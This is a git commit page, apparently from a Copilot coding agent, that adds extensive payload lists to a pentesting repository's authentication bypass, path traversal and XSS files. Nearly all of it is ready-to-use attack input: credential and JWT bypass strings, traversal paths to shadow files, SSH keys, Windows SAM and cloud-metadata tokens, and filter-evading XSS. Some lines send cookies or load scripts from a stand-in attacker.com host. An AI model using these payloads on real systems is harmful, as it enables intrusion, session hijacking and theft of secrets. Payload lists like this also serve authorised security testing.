0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity

Enhance existing vulnerabilities with comprehensive payloads (XSS, Auth Bypass, Path Traversal) and update README

Browse Source 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
2026-01-05 14:53:43 +00:00
parent 68b76036df
commit b58ed035c8
4 changed files with 729 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Authentication-Bypass/auth-bypass-payloads.txt
+223
View File
@@ -45,3 +45,226 @@ X-Original-URL: /admin
X-Rewrite-URL: /admin X-Rewrite-URL: /admin
X-Originating-IP: 127.0.0.1 X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1 X-Remote-Addr: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Host: localhost
X-Forwarded-Host: localhost
# URL path manipulation
/admin/..;/
/admin/%2e%2e%3b/
/./admin/./
/admin;/
/admin..
//admin//
/./admin/./panel
/%2e/admin
/admin/~
/admin#
/admin?
# HTTP verb tampering
GET /admin
POST /admin
HEAD /admin
PUT /admin
DELETE /admin
OPTIONS /admin
TRACE /admin
PATCH /admin
# Case manipulation
/Admin
/ADMIN
/AdMiN
/aDmIn
# Unicode bypass
/admin%c0%af
/admin%e0%80%af
/admin%c0%ae%c0%ae/
/%61dmin
# Double encoding
/%252e%252e%252fadmin
/%252e%252e/admin
# Null byte injection
/admin%00
/admin%00.html
/admin%00.jpg
# Credential stuffing patterns
admin:admin
administrator:administrator
root:root
admin:password
admin:123456
admin:admin123
test:test
guest:guest
user:user
demo:demo
# Default credentials bypass
username=admin&password=
username=&password=
username=admin&password=%20
username=admin&password=*
# Password reset bypass
email=victim@example.com&email=attacker@example.com
token=&email=attacker@example.com
token=0
token=null
token=false
# OTP/2FA bypass
otp=000000
otp=123456
otp=111111
otp=
otp=%20
otp=null
# Response manipulation
# Change HTTP response from 401/403 to 200
# Change "authenticated": false to "authenticated": true
# Change "role": "user" to "role": "admin"
# JWT manipulation (see JWT-Vulnerabilities for more)
Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
Authorization: Bearer null
Authorization: Bearer
Authorization:
# GraphQL authentication bypass
{"query":"mutation{login(username:\"admin\",password:\"' OR '1'='1\"){token}}"}
{"query":"{users{id username password}}"}
# XML authentication bypass
<user><username>admin</username><password>' OR '1'='1</password></user>
# LDAP authentication bypass
username=*
username=admin)(|(password=*
username=*)(uid=*))(|(uid=*
# OAuth/OIDC bypass
redirect_uri=https://attacker.com
state=
nonce=
code=
# API key bypass
api_key=
X-API-Key:
Authorization:
apikey=null
# Session fixation
PHPSESSID=attacker_controlled_session
jsessionid=12345
# CAPTCHA bypass
captcha=
g-recaptcha-response=
h-captcha-response=
captcha_response=03AAYGu2...
recaptcha=
# Rate limiting bypass
X-Forwarded-For: random_ip_each_request
X-Originating-IP: random_ip_each_request
X-Remote-IP: random_ip_each_request
# Account enumeration
username=admin&password=wrong
username=nonexistent&password=wrong
# Login form variations
user[admin]=1
user[role]=admin
username[]=admin
password[]=anything
# Time-based bypass
wait_for_rate_limit=true
timestamp=future_date
valid_until=9999999999
# Magic hashes (PHP type juggling)
# 0e215962017 == 0 (PHP)
# 0e291242476940776845150308577824 == 0
password=0e215962017
password=240610708
# Unicode normalization
username=ⓐⓓⓜⓘⓝ
username=𝒶𝒹𝓂𝒾𝓃
username=admin
# Homograph attack
username=αdmin (Greek alpha)
username=аdmin (Cyrillic а)
# Whitespace bypass
username= admin
username=admin
username=%20admin
username=admin%20
# Special characters
username=admin'
username=admin"
username=admin`
username=admin\
# Email bypass for authentication
email=admin@localhost
email=admin@127.0.0.1
email=@example.com
email=victim@attacker.com
# Host header authentication bypass
Host: localhost
Host: 127.0.0.1
Host: internal.company.com
# Referer bypass
Referer: https://trusted-site.com
Referer: https://localhost
# Origin bypass
Origin: https://trusted-site.com
Origin: null
# Authentication via GET instead of POST
GET /api/login?username=admin&password=admin123
# File inclusion for authentication bypass
/etc/passwd
../../../../../../etc/passwd
# SSRF to bypass authentication
url=http://localhost/admin
url=http://127.0.0.1/admin
url=http://169.254.169.254/latest/meta-data/
# Request smuggling for authentication bypass
Content-Length: 0
Transfer-Encoding: chunked
# Race conditions
# Send multiple authentication requests simultaneously
# Business logic bypass
step=1&step=3
status=pending&status=approved
verified=false&verified=true
# Broken authentication chain
# Skip step 2 in multi-step authentication
# Reuse old session tokens
# Replay old authentication requests
Path-Traversal/path-traversal-payloads.txt
+290
View File
@@ -55,3 +55,293 @@
../../../.env ../../../.env
../../../web.config ../../../web.config
../../../application.properties ../../../application.properties
# Advanced encoding techniques
..%c0%af
..%c1%9c
..%e0%80%af
..%f0%80%80%af
..%c0%2f
..%c0%5c
# Unicode bypass
..%u2216
..%u2215
..%uEFC8
..%uF025
# 16-bit Unicode
..%c0%af
..%c1%9c
%c0%ae%c0%ae/
%c0%ae%c0%ae%c0%af
# UTF-8 encoding
%e0%80%ae%e0%80%ae/
%c0%2e%c0%2e/
%uff0e%uff0e/
# Overlong UTF-8
..%c0%af
..%e0%80%af
..%c0%2e%c0%2e%c0%2f
# Backslash variations
..\
..\..
..\\
..\\..\\
%2e%2e%5c
%2e%2e%2f
# Mixed slash/backslash
..\/
..\/..\
../\..\
..\/../
# Absolute path bypass
/etc/passwd
/etc/shadow
/etc/hosts
/var/log/apache2/access.log
/var/log/auth.log
/proc/self/environ
/proc/self/cmdline
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
# Windows absolute paths
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\boot.ini
C:\inetpub\wwwroot\web.config
# Nested traversal
....//
....\/
..../\
....\\
# Dot segment bypass
./../
./../../
././../
./.././../
# Multiple slashes
...//
....///
.....////
# Filter bypass with current directory
.//.//.//.//..//
.//.//.//.//.//
# Stripped traversal (if ../ is filtered)
...//...//
....\/....\/
..;/..;/
..;//..;//
# Null byte variations
../../../etc/passwd%00
../../../etc/passwd%00.png
../../../etc/passwd\x00
../../../etc/passwd\0
# Path normalization bypass
/var/www/../../etc/passwd
/./var/./www/./../../etc/passwd
//var//www//../../etc/passwd
# URL parameter pollution
?file=safe.txt&file=../../../etc/passwd
?path=images&path=../../../etc/passwd
# Common web files
../../../index.php
../../../index.html
../../../wp-config.php
../../../configuration.php
../../../settings.php
../../../config.php
../.git/config
../.env
../.htaccess
# Framework-specific files
# Laravel
../../../.env
../../../storage/logs/laravel.log
../../../config/database.php
../../../config/app.php
# Symfony
../../../.env.local
../../../config/packages/security.yaml
../../../var/log/dev.log
# Django
../../../settings.py
../../../manage.py
../../../db.sqlite3
# Spring Boot
../../../application.properties
../../../application.yml
../../../application-prod.properties
# Ruby on Rails
../../../config/database.yml
../../../config/secrets.yml
../../../Gemfile
# Node.js/Express
../../../package.json
../../../.env
../../../config/default.json
# ASP.NET
../../../web.config
../../../Web.config
../../../appsettings.json
../../../appsettings.Production.json
# Java
../../../WEB-INF/web.xml
../../../META-INF/context.xml
../../../WEB-INF/classes/application.properties
# Cloud provider metadata
../../../../../../proc/self/environ
../../../../../../proc/version
../../../../../../proc/cmdline
# AWS metadata
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/user-data/
http://169.254.169.254/latest/dynamic/instance-identity/document
# Azure metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
# GCP metadata
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Docker
../../../../../../proc/self/cgroup
../../../../../../proc/self/mountinfo
../../../../../../etc/hostname
# Log files
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/auth.log
../../../var/log/syslog
../../../var/log/mail.log
../../../var/log/mysql/error.log
# Windows log files
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
# SSH keys
../../../root/.ssh/id_rsa
../../../root/.ssh/id_dsa
../../../root/.ssh/authorized_keys
../../../home/user/.ssh/id_rsa
../../../home/user/.ssh/authorized_keys
# Database files
../../../var/lib/mysql/mysql/user.MYD
../../../var/lib/postgresql/data/pg_hba.conf
../../../var/lib/mongodb/data/db
# Backup files
../../../backup.sql
../../../database.sql
../../../db_backup.sql
../../../site_backup.tar.gz
../../../backup.zip
# Source code files
../../../.git/HEAD
../../../.git/config
../../../.git/logs/HEAD
../../../.svn/entries
../../../.hg/hgrc
# Session files
../../../tmp/sess_*
../../../var/lib/php/sessions/sess_*
../../../tmp/sessions/*
# Cache files
../../../tmp/cache/*
../../../var/cache/*
../../../storage/cache/*
# Temporary files
../../../tmp/*
../../../temp/*
../../../var/tmp/*
# SSRF via path traversal
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file://localhost/etc/passwd
file://127.0.0.1/etc/passwd
# Path traversal in cookies
Cookie: file=../../../etc/passwd
Cookie: path=../../../var/www/html/index.php
# Path traversal in headers
X-File: ../../../etc/passwd
X-Path: ../../../var/www/html/config.php
User-Agent: ../../../etc/passwd
Referer: ../../../etc/passwd
# Path traversal in JSON
{"file":"../../../etc/passwd"}
{"path":"../../../var/www/html/config.php"}
{"template":"../../../etc/passwd"}
# Path traversal in XML
<file>../../../etc/passwd</file>
<path>../../../var/www/html/config.php</path>
# Polyglot path traversal
....//....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
..%c0%af..%c0%af..%c0%afetc/passwd
# Filter evasion
..%00/..%00/..%00/etc/passwd
..%20/..%20/..%20/etc/passwd
..%09/..%09/..%09/etc/passwd
# Case sensitivity (Windows)
..\\..\\..\\..\\..\\..\\..\\.\\ETC\\PASSWD
..\\..\\..\\..\\..\\..\\..\\.\\Etc\\Passwd
# Alternate data streams (Windows)
../../../test.txt::$DATA
../../../test.txt::$INDEX_ALLOCATION
# UNC paths (Windows)
\\\\localhost\\C$\\Windows\\System32\\drivers\\etc\\hosts
\\\\127.0.0.1\\C$\\Windows\\System32\\config\\SAM
# Mac/Linux specific
../../../etc/passwd
../../../etc/master.passwd
../../../private/etc/master.passwd
../../../Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist
README.md
+4
View File
@@ -12,6 +12,7 @@ This repository contains a complete collection of testing payloads organized by
- **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB) - **[NoSQL Injection](./NoSQL-Injection/)** - NoSQL database injection (MongoDB, Redis, CouchDB)
- **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection - **[XSS (Cross-Site Scripting)](./XSS/)** - Client-side code injection
- **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks - **[Command Injection](./Command-Injection/)** - OS command execution & symbolic link attacks
- **[SSTI (Server-Side Template Injection)](./SSTI/)** - Template engine exploitation & RCE
- **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets - **[CSV Injection](./CSV-Injection/)** - Formula injection in spreadsheets
- **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation - **[LDAP Injection](./LDAP-Injection/)** - Directory service manipulation
- **[Log Injection](./Log-Injection/)** - Log file manipulation - **[Log Injection](./Log-Injection/)** - Log file manipulation
@@ -34,6 +35,9 @@ This repository contains a complete collection of testing payloads organized by
**Configuration & Design:** **Configuration & Design:**
- **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations - **[Security Misconfiguration](./Security-Misconfiguration/)** - Default credentials, misconfigurations
- **[CORS Misconfiguration](./CORS-Misconfiguration/)** - Cross-origin resource sharing issues
- **[HTTP Request Smuggling](./HTTP-Request-Smuggling/)** - Request desynchronization attacks
- **[JWT Vulnerabilities](./JWT-Vulnerabilities/)** - JSON Web Token implementation flaws
- **[Business Logic](./Business-Logic/)** - Business logic flaws - **[Business Logic](./Business-Logic/)** - Business logic flaws
- **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations - **[Weak Cryptography](./Weak-Cryptography/)** - Weak crypto implementations
- **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries - **[Vulnerable Components](./Vulnerable-Components/)** - Known vulnerable libraries
XSS/xss-payloads.txt
+212
View File
@@ -541,3 +541,215 @@ a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
# SVG/HTML nesting XSS # SVG/HTML nesting XSS
<svg></svg></iframe> <svg></svg></iframe>
# Modern XSS vectors and WAF bypasses
# AngularJS template injection
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$parent.constructor('alert(1)')()}}
<div ng-app ng-csp><div ng-controller="test">{{$eval.constructor('alert(1)')()}}</div></div>
# VueJS template injection
{{constructor.constructor('alert(1)')()}}
{{_c.constructor('alert(1)')()}}
<div v-html="'<img src=x onerror=alert(1)>'"></div>
# React JSX injection
<img src=x onerror={alert(1)} />
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}} />
# Mutation XSS (mXSS)
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<listing>&lt;img src=x onerror=alert(1)&gt;</listing>
<style><img src=x onerror=alert(1)></style>
# DOM clobbering
<form id=test><input id=test2></form><form id=test2><input id=test></form>
<img name=alert id=alert src=x onerror=alert(1)>
<form name=test><input id=attributes></form>
# Polyglot XSS
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
# HTML5 new tags
<details open ontoggle=alert(1)>
<details open ontoggle="alert(1)">
<marquee onstart=alert(1)>
<meter onmouseover=alert(1)>0</meter>
<progress value=0 max=100 onmouseover=alert(1)>
<dialog open onclose=alert(1)>
<keygen onfocus=alert(1)>
# WebSocket XSS
<script>ws=new WebSocket('ws://attacker.com');ws.send(document.cookie);</script>
# postMessage XSS
<script>parent.postMessage('<img src=x onerror=alert(1)>','*')</script>
<iframe src="javascript:parent.postMessage('<img src=x onerror=alert(1)>','*')">
# Web Worker XSS
<script>w=new Worker('data:text/javascript,postMessage(document.cookie)');</script>
# Service Worker XSS
<script>navigator.serviceWorker.register('data:text/javascript,alert(1)')</script>
# CSS-based XSS
<style>@import'data:text/css,body{background:url(javascript:alert(1))}';</style>
<style>*{background:url('javascript:alert(1)')}</style>
<link rel=stylesheet href='data:text/css,*{x:expression(alert(1))}'>
# XML namespace XSS
<html xmlns:xss>
<?import namespace="xss" implementation="http://attacker.com/xss.htc"?>
<xss:xss>test</xss:xss>
# XSLT XSS
<xsl:value-of select="system-property('xsl:vendor')"/>
<xsl:template match="/">
<script>alert(1)</script>
</xsl:template>
# Unicode bypass
\u003cscript\u003ealert(1)\u003c/script\u003e
<script>alert\u0028 1\u0029</script>
\x3cscript\x3ealert(1)\x3c/script\x3e
# Octal encoding
\74\163\143\162\151\160\164\76alert(1)\74\57\163\143\162\151\160\164\76
# Hex encoding
\x3c\x73\x63\x72\x69\x70\x74\x3ealert(1)\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
# HTML entity encoding
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
# Double encoding
%253Cscript%253Ealert(1)%253C%2Fscript%253E
# UTF-7 encoding
+ADw-script+AD4-alert(1)+ADw-/script+AD4-
# WAF bypass with comments
<scr<!---->ipt>alert(1)</scr<!---->ipt>
<scr<script>ipt>alert(1)</scr</script>ipt>
# WAF bypass with null bytes
<script\x00>alert(1)</script>
<scri\x00pt>alert(1)</scri\x00pt>
# WAF bypass with newlines
<script
>alert(1)</script>
<scri\npt>alert(1)</scri\npt>
# Obfuscated JavaScript
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>Function('alert(1)')()</script>
<script>[1].map(alert)</script>
<script>top[/al/.source+/ert/.source](1)</script>
# JSFuck
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
# Content Security Policy bypass
<link rel="prefetch" href="javascript:alert(1)">
<link rel="prerender" href="javascript:alert(1)">
<base href="javascript:alert(1)//">
# srcdoc iframe XSS
<iframe srcdoc="<script>alert(1)</script>">
<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">
# HTML imports XSS
<link rel="import" href="data:text/html,<script>alert(1)</script>">
# Script gadgets
<div id=x tabindex=1 onfocus=alert(1)></div><input value=clickme>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<video poster=javascript:alert(1)//></video>
<body onload=alert(1)>
<body oninput=alert(1)><input autofocus>
# RPO (Relative Path Overwrite)
<script src="//attacker.com/poc.js"></script>
<script src="/poc.js"></script>
# Dangling markup injection
"><img src='//attacker.com?
'><img src='//attacker.com?
# AngularJS 1.6+ sandbox bypass
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
# Template literals
<script>eval(`alert\x281\x29`)</script>
<script>Function`x${alert`1`}x`</script>
# Arrow functions
<script>_=alert,_(1)</script>
<script>(alert)(1)</script>
<script>[alert][0](1)</script>
# ES6 features
<script>({alert}={alert:alert},{alert}(1))</script>
<script>[a,b,c,...alert]=1</script>
# Event handlers with spaces
< img src=x onerror=alert(1)>
<img src=x onerror= alert(1)>
<img src=x onerror = alert(1)>
# Without quotes
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert(document.domain)>
# Protocol-relative URL
<script src=//attacker.com/xss.js></script>
<img src=//attacker.com/x onerror=alert(1)>
# Meta refresh XSS
<meta http-equiv="refresh" content="0;url=javascript:alert(1)">
<meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">
# Form action XSS
<form action="javascript:alert(1)"><input type=submit></form>
<form><button formaction="javascript:alert(1)">Click</button></form>
# Object data XSS
<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
# Embed src XSS
<embed src="javascript:alert(1)">
<embed src="data:text/html,<script>alert(1)</script>">
# Applet XSS
<applet code="java.lang.Runtime">
# Audio/Video XSS
<audio src=x onerror=alert(1)>
<video src=x onerror=alert(1)>
# Picture XSS
<picture><source srcset="javascript:alert(1)"></picture>
# Track XSS
<video><track default src="javascript:alert(1)"></video>
# Shadow DOM XSS
<div><template shadowroot=open><script>alert(1)</script></template></div>
# Custom elements XSS
<custom-element onconnected=alert(1)>
# Web Components XSS
<x-element><script>alert(1)</script></x-element>